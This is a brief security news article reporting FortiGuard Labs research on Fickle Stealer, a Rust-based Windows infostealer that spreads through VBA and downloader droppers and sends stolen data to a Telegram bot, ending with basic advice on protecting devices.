New Rust-based malware targets Microsoft Windows, exploits Powershell and steals sensitive information
Security professionals are warning about a new info stealer that is being spread over the Internet using various methods.
Fickle Stealer performs the usual tactics: steals sensitive files, system information, files stored in the browser, cryptocurrency wallet information and more, but what is somewhat unusual about Fickle Stealer is that it is built on Rust.
“In addition to some popular applications, this stealer also searches sensitive files in parent directories of common installation directories to ensure comprehensive data collection,” said security researcher Pei Han Liao. “It also receives a target list from the server, which makes Fickle Stealer more flexible.”
Avoid info stealers
Cybersecurity researchers at Fortinet FortiGuard Labs say there are four separate distribution methods for Fickle Stealer, including a VBA dropper, a VBA downloader, link downloader, and executable downloader.
Some of these methods also use a PowerShell script that also bypasses the User Account Control (UAC) mechanisms. The PowerShell script also sends system information such as the device’s country and city, IP address, operating system version, computer name, and username.
All data is exfiltrated to a Telegram bot.
Besides ransomware, infostealers are among the most popular and most disruptive forms of malware out there. They provide threat actors with access to sensitive services such as bank accounts, social media profiles, and corporate platforms. Furthermore, with cryptocurrency wallet data, hackers can import the information into their own wallets, essentially stealing any money they find there.
Finally, info stealers give them access to people’s email inboxes, which can then lead to phishing attacks, impersonation and identity theft, and even ransomware attacks on companies’ IT infrastructure.
Securing a device against infostealers is the same as securing it against any other form of malware: by not downloading and running suspicious files, and by double-checking all attachments in the email.
Through The HackerNews